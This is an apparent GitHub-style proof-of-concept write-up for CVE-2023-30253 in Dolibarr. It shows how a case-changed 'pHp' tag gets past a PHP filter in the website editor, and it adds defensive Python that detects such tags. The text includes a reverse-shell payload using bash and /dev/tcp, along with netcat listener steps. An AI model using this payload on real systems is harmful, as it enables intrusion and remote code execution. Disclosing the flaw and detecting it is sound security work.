## **CVE-2023-30253**

CVE-2023-30253 is a vulnerability in Dolibarr that lets an authenticated user execute code remotely by changing the letter case of injected data (for example `pHp` instead of `php`).

## Impact

This vulnerability can lead to unauthorized remote code execution by malicious actors, posing a severe threat to the security and integrity of the affected systems.
The vulnerability has been fixed in Dolibarr 17.0.1.



## **Proof of Concept**

The following PoC shows how to get a reverse shell manually.


After logging in as the test user, we can create or modify a website.

![Untitled (1).png](images/Untitled_(1).png)

First create a website, and then create a page.

![Untitled (2).png](images/Untitled_(2).png)


After creating the website and the page, click on the binoculars icon; this opens the created page in a new tab.

Now click on Edit HTML Source.

![Untitled (4).png](images/Untitled_(4).png)

Here we can try adding PHP code, but a filter prevents us from saving it.
This is easily bypassed by changing the letter case of the word php.

![Untitled (5).png](images/Untitled_(5).png)

After changing the word php to pHp, we can see the page is saved successfully.

![Untitled (6).png](images/Untitled_(6).png)

Going to the page, we can see our inserted PHP code is working.

Now, to get a reverse shell, let's set up a netcat listener.

![Untitled (7).png](images/Untitled_(7).png)

![Untitled (8).png](images/Untitled_(8).png)

Then add our reverse shell code `<?pHp exec("/bin/bash -c 'bash -i > /dev/tcp/ 0>&1'"); ?>`

Now opening the website gives us a reverse shell.

![Untitled (9).png](images/Untitled_(9).png)
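For defenders, the filter weakness shown above can be modelled and checked for in stored page sources. The following is an added example, not code from Dolibarr or from the original write-up: the function names and sample pages are assumptions, and `case_sensitive_filter` is only a simplified model of a check that matches lowercase `<?php`.

```python
import re

# PHP accepts its open tag in any letter case, so "<?pHp" starts a code block.
PHP_OPEN_TAG = re.compile(r"<\?php", re.IGNORECASE)


def case_sensitive_filter(content: str) -> bool:
    """Simplified model of the weak check: True means the save is rejected."""
    return "<?php" in content


def case_insensitive_filter(content: str) -> bool:
    """Hardened check: reject the open tag whatever its letter case."""
    return PHP_OPEN_TAG.search(content) is not None


def find_php_tags(pages: dict) -> list:
    """Scan stored page sources and report every PHP open tag with its location.

    'case_variant' is True when the tag is not all-lowercase, which is the
    form that slips past a case-sensitive filter.
    """
    findings = []
    for name, source in pages.items():
        for line_no, line in enumerate(source.splitlines(), start=1):
            for match in PHP_OPEN_TAG.finditer(line):
                findings.append({
                    "page": name,
                    "line": line_no,
                    "tag": match.group(0),
                    "case_variant": match.group(0) != "<?php",
                })
    return findings


# Constructed sample page sources (not taken from a real instance).
SAMPLE_PAGES = {
    "home": "<section>\n<h1>Welcome</h1>\n</section>",
    "contact": "<p>Contact</p>\n<?php echo 'hi'; ?>",
    "promo": "<div>\n<p>Sale</p>\n<?pHp echo 2*3; ?>\n</div>",
}

if __name__ == "__main__":
    for name, src in SAMPLE_PAGES.items():
        print(name, case_sensitive_filter(src), case_insensitive_filter(src))
    for finding in find_php_tags(SAMPLE_PAGES):
        print(finding)
```

Entries with `case_variant` set are worth reviewing first on an instance that ran a version before 17.0.1, since an ordinary editor has little reason to write the tag in mixed case.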




We can use the Python script to make this easier.

Set up a netcat listener.

Run the script and we should have a reverse shell.
